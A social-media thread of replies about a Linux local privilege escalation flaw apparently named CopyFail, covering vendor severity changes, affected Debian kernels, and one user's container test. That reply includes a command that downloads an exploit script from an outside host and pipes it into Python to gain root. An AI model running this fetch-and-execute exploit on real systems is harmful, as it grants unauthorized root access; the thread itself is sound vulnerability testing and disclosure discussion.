Yeah I tested CopyFail.

Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 23:17:26 GMT

emily@infosec.exchange — Wed, 29 Apr 2026 23:17:26 GMT

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

cve-details

(access.redhat.com)

Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 19:49:21 GMT

agentk@chaos.social — Wed, 29 Apr 2026 19:49:21 GMT

@mttaggart Debian 13 still vulnerable with 6.12.74

Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 19:02:00 GMT

aburka@hachyderm.io — Wed, 29 Apr 2026 19:02:00 GMT

@mttaggart tested it in a docker image (used Noble as the LTS releases have patched kernels already):

```
host $ docker run --rm -it ubuntu:noble
container # apt update && apt install curl python3
container # su ubuntu
container $ curl https://copy.fail/exp | python3 && su
container #
```

I'd say this is a welp of considerable magnitude

Reply to Yeah I tested CopyFail. on Wed, 29 Apr 2026 18:51:44 GMT

jscybersec@infosec.exchange — Wed, 29 Apr 2026 18:51:44 GMT

@mttaggart Can't privesc me if I always run as root!